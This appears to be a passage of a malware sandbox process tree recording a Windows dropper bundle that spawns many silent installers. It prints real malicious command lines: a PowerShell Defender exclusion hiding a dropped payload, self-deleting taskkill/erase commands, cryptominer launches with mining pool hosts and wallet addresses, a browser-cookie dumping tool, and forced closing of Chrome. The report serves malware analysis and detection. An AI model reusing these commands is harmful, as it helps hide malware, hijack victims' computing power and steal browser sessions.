-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Remove.bat" 6176 C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"13⤵PID:5512
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 617614⤵
- Kills process with taskkill
PID:6364
-
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 314⤵PID:7776
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"11⤵PID:5676
-
C:\Users\Admin\AppData\Local\Temp\ZPM1XHW5FQ\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\ZPM1XHW5FQ\multitimer.exe" 0 306065bb10421b26.04333812 0 10312⤵PID:6964
-
C:\Users\Admin\AppData\Local\Temp\ZPM1XHW5FQ\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\ZPM1XHW5FQ\multitimer.exe" 1 3.1617432518.60680fc602055 10313⤵PID:7072
-
C:\Users\Admin\AppData\Local\Temp\ZPM1XHW5FQ\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\ZPM1XHW5FQ\multitimer.exe" 2 3.1617432518.60680fc60205514⤵PID:5024
-
C:\Users\Admin\AppData\Local\Temp\zht0mlrmyxu\app.exe"C:\Users\Admin\AppData\Local\Temp\zht0mlrmyxu\app.exe" /8-2315⤵PID:5988
-
C:\Users\Admin\AppData\Local\Temp\zht0mlrmyxu\app.exe"C:\Users\Admin\AppData\Local\Temp\zht0mlrmyxu\app.exe" /8-2316⤵PID:6280
-
-
-
C:\Users\Admin\AppData\Local\Temp\wnrp1onotbq\vict.exe"C:\Users\Admin\AppData\Local\Temp\wnrp1onotbq\vict.exe" /VERYSILENT /id=53515⤵PID:1684
-
C:\Users\Admin\AppData\Local\Temp\is-K9SA0.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-K9SA0.tmp\vict.tmp" /SL5="$302AA,870426,780800,C:\Users\Admin\AppData\Local\Temp\wnrp1onotbq\vict.exe" /VERYSILENT /id=53516⤵PID:6516
-
C:\Users\Admin\AppData\Local\Temp\is-G2S9B.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-G2S9B.tmp\win1host.exe" 53517⤵PID:4316
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\lzdxdcay32g\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\lzdxdcay32g\Setup3310.exe" /Verysilent /subid=57715⤵PID:6036
-
C:\Users\Admin\AppData\Local\Temp\is-HMN1B.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-HMN1B.tmp\Setup3310.tmp" /SL5="$302A2,138429,56832,C:\Users\Admin\AppData\Local\Temp\lzdxdcay32g\Setup3310.exe" /Verysilent /subid=57716⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:4232 -
C:\Users\Admin\AppData\Local\Temp\is-MDLIP.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-MDLIP.tmp\Setup.exe" /Verysilent17⤵PID:5912
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ytji5cw3ezx\vpn.exe"C:\Users\Admin\AppData\Local\Temp\ytji5cw3ezx\vpn.exe" /silent /subid=48215⤵PID:3784
-
C:\Users\Admin\AppData\Local\Temp\is-SOC31.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-SOC31.tmp\vpn.tmp" /SL5="$602F2,15170975,270336,C:\Users\Admin\AppData\Local\Temp\ytji5cw3ezx\vpn.exe" /silent /subid=48216⤵PID:6100
-
-
-
C:\Users\Admin\AppData\Local\Temp\vzdbbzn3avr\nhbiw5mosod.exe"C:\Users\Admin\AppData\Local\Temp\vzdbbzn3avr\nhbiw5mosod.exe" /ustwo INSTALL15⤵PID:5256
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "nhbiw5mosod.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\vzdbbzn3avr\nhbiw5mosod.exe" & exit16⤵PID:6612
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "nhbiw5mosod.exe" /f17⤵
- Kills process with taskkill
PID:4260
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\aqhkus3bn5n\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\aqhkus3bn5n\cpyrix.exe" /VERYSILENT15⤵PID:4880
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe16⤵PID:4196
-
C:\Users\Admin\AppData\Local\Temp\024c87e2-2d2e-4398-94df-2839ae8ab639\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\024c87e2-2d2e-4398-94df-2839ae8ab639\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\024c87e2-2d2e-4398-94df-2839ae8ab639\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run17⤵PID:3348
-
C:\Users\Admin\AppData\Local\Temp\024c87e2-2d2e-4398-94df-2839ae8ab639\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\024c87e2-2d2e-4398-94df-2839ae8ab639\AdvancedRun.exe" /SpecialRun 4101d8 334818⤵PID:7816
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force17⤵PID:7476
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 117⤵PID:7848
-
C:\Windows\SysWOW64\timeout.exetimeout 118⤵
- Delays execution with timeout.exe
PID:4988
-
-
-
C:\Users\Admin\AppData\Roaming\1.exe"C:\Users\Admin\AppData\Roaming\1.exe"17⤵PID:8148
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4196 -s 170017⤵
- Program crash
PID:7856
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe16⤵PID:5260
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"17⤵PID:4500
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\8F9NXL02MG\setups.exe"C:\Users\Admin\AppData\Local\Temp\8F9NXL02MG\setups.exe" ll12⤵PID:7080
-
C:\Users\Admin\AppData\Local\Temp\is-BD7V1.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-BD7V1.tmp\setups.tmp" /SL5="$3041E,635399,250368,C:\Users\Admin\AppData\Local\Temp\8F9NXL02MG\setups.exe" ll13⤵PID:7160
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\hdpqx5eebz5\app.exe"C:\Users\Admin\AppData\Local\Temp\hdpqx5eebz5\app.exe" /8-238⤵PID:4704
-
C:\Users\Admin\AppData\Local\Temp\hdpqx5eebz5\app.exe"C:\Users\Admin\AppData\Local\Temp\hdpqx5eebz5\app.exe" /8-239⤵PID:5548
-
-
-
C:\Users\Admin\AppData\Local\Temp\iiuehdoa3n5\qv5rajhud4h.exe"C:\Users\Admin\AppData\Local\Temp\iiuehdoa3n5\qv5rajhud4h.exe"8⤵PID:4928
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\iiuehdoa3n5\qv5rajhud4h.exe"9⤵PID:5660
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 300010⤵
- Runs ping.exe
PID:5836
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ey311eqqyk1\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\ey311eqqyk1\cpyrix.exe" /VERYSILENT8⤵PID:4872
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe9⤵PID:5556
-
C:\Users\Admin\AppData\Local\Temp\52e939be-84ae-4e6b-a0f3-ef5b3dc76a33\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\52e939be-84ae-4e6b-a0f3-ef5b3dc76a33\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\52e939be-84ae-4e6b-a0f3-ef5b3dc76a33\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run10⤵PID:6324
-
C:\Users\Admin\AppData\Local\Temp\52e939be-84ae-4e6b-a0f3-ef5b3dc76a33\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\52e939be-84ae-4e6b-a0f3-ef5b3dc76a33\AdvancedRun.exe" /SpecialRun 4101d8 632411⤵PID:6844
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force10⤵PID:1836
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 110⤵PID:4328
-
C:\Windows\SysWOW64\timeout.exetimeout 111⤵
- Delays execution with timeout.exe
PID:3732
-
-
-
C:\Users\Admin\AppData\Roaming\1.exe"C:\Users\Admin\AppData\Roaming\1.exe"10⤵PID:4748
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5556 -s 184810⤵
- Program crash
PID:4776
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe9⤵PID:5600
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"10⤵PID:6312
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\uxlz5kn3a40\ty2gvcgqv5f.exe"C:\Users\Admin\AppData\Local\Temp\uxlz5kn3a40\ty2gvcgqv5f.exe" /ustwo INSTALL8⤵PID:5080
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "ty2gvcgqv5f.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\uxlz5kn3a40\ty2gvcgqv5f.exe" & exit9⤵PID:6332
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "ty2gvcgqv5f.exe" /f10⤵
- Kills process with taskkill
PID:6480
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\vjr0hbykuky\vpn.exe"C:\Users\Admin\AppData\Local\Temp\vjr0hbykuky\vpn.exe" /silent /subid=4828⤵PID:5236
-
C:\Users\Admin\AppData\Local\Temp\is-HCM24.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-HCM24.tmp\vpn.tmp" /SL5="$20498,15170975,270336,C:\Users\Admin\AppData\Local\Temp\vjr0hbykuky\vpn.exe" /silent /subid=4829⤵PID:5300
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "10⤵PID:6436
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090111⤵PID:4916
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "10⤵PID:7008
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090111⤵PID:2708
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall10⤵PID:4524
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install10⤵PID:7912
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\hezbv1rvcyg\2vuqkknpdcb.exe"C:\Users\Admin\AppData\Local\Temp\hezbv1rvcyg\2vuqkknpdcb.exe" /quiet SILENT=1 AF=7568⤵PID:5332
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\hezbv1rvcyg\2vuqkknpdcb.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\hezbv1rvcyg\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617173326 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"9⤵PID:5684
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\GQ8X5137BC\setups.exe"C:\Users\Admin\AppData\Local\Temp\GQ8X5137BC\setups.exe" ll5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3328 -
C:\Users\Admin\AppData\Local\Temp\is-AH2L3.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-AH2L3.tmp\setups.tmp" /SL5="$4013E,635399,250368,C:\Users\Admin\AppData\Local\Temp\GQ8X5137BC\setups.exe" ll6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:508
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2284 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵PID:4992
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
PID:4844
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full Program Features.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full Program Features.exe"4⤵PID:5168
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"5⤵PID:5716
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install6⤵PID:6000
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"4⤵PID:5924
-
C:\Users\Admin\AppData\Roaming\69C7.tmp.exe"C:\Users\Admin\AppData\Roaming\69C7.tmp.exe"5⤵PID:6072
-
C:\Users\Admin\AppData\Roaming\69C7.tmp.exe"C:\Users\Admin\AppData\Roaming\69C7.tmp.exe"6⤵PID:5860
-
-
-
C:\Users\Admin\AppData\Roaming\6D23.tmp.exe"C:\Users\Admin\AppData\Roaming\6D23.tmp.exe"5⤵PID:5176
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999996⤵PID:6724
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 99996⤵PID:6904
-
-
-
C:\Users\Admin\AppData\Roaming\6F28.tmp.exe"C:\Users\Admin\AppData\Roaming\6F28.tmp.exe"5⤵PID:1676
-
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\6F28.tmp.exe6⤵PID:4968
-
C:\Windows\SysWOW64\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:1488
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"5⤵PID:6584
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:6920
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"4⤵PID:6888
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"4⤵PID:2040
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"4⤵PID:5992
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:6680
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:7920
-
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3156
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:1936
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4168
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:4232
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:6120
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:5124
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding C84F1DC16144DCB381B9A81CBAB3B7DF C2⤵PID:4488
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 1016D54386B40ECE58E9B861359B9E082⤵PID:4712
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"2⤵PID:7532
-
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=756 -BF=default -uncf=default3⤵PID:8008
-
-
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\9bd1a7d3ff1945348e2891d3cd1433d5 /t 2116 /p 30681⤵PID:1172
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:4400
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:6420
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\d37d56484229426fb4f51d7cfb7393d3 /t 5520 /p 44001⤵PID:5956
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵PID:4360
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{39a87653-4ebf-1241-8418-a355291cc408}\oemvista.inf" "9" "4d14a44ff" "000000000000016C" "WinSta0\Default" "0000000000000174" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵PID:2892
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000168"2⤵PID:4460
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵PID:6880
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵PID:4128
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:3092
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:7336
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵PID:8120
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\ce4038bdbe7f45e3a5891f30365418b2 /t 7288 /p 30921⤵PID:7540
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵PID:4812
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:188
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:7216
-
C:\Users\Admin\AppData\Local\Temp\C8E0.exeC:\Users\Admin\AppData\Local\Temp\C8E0.exe1⤵PID:7068
-
C:\Users\Admin\AppData\Local\Temp\CDD3.exeC:\Users\Admin\AppData\Local\Temp\CDD3.exe1⤵PID:3848
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7824
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6984
-
C:\Users\Admin\AppData\Local\Temp\DEFA.exeC:\Users\Admin\AppData\Local\Temp\DEFA.exe1⤵PID:7948
-
C:\Users\Admin\AppData\Local\Temp\E65E.exeC:\Users\Admin\AppData\Local\Temp\E65E.exe1⤵PID:7988
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5504
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:7748
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:4164
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:7672
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:4004
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:852
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:4272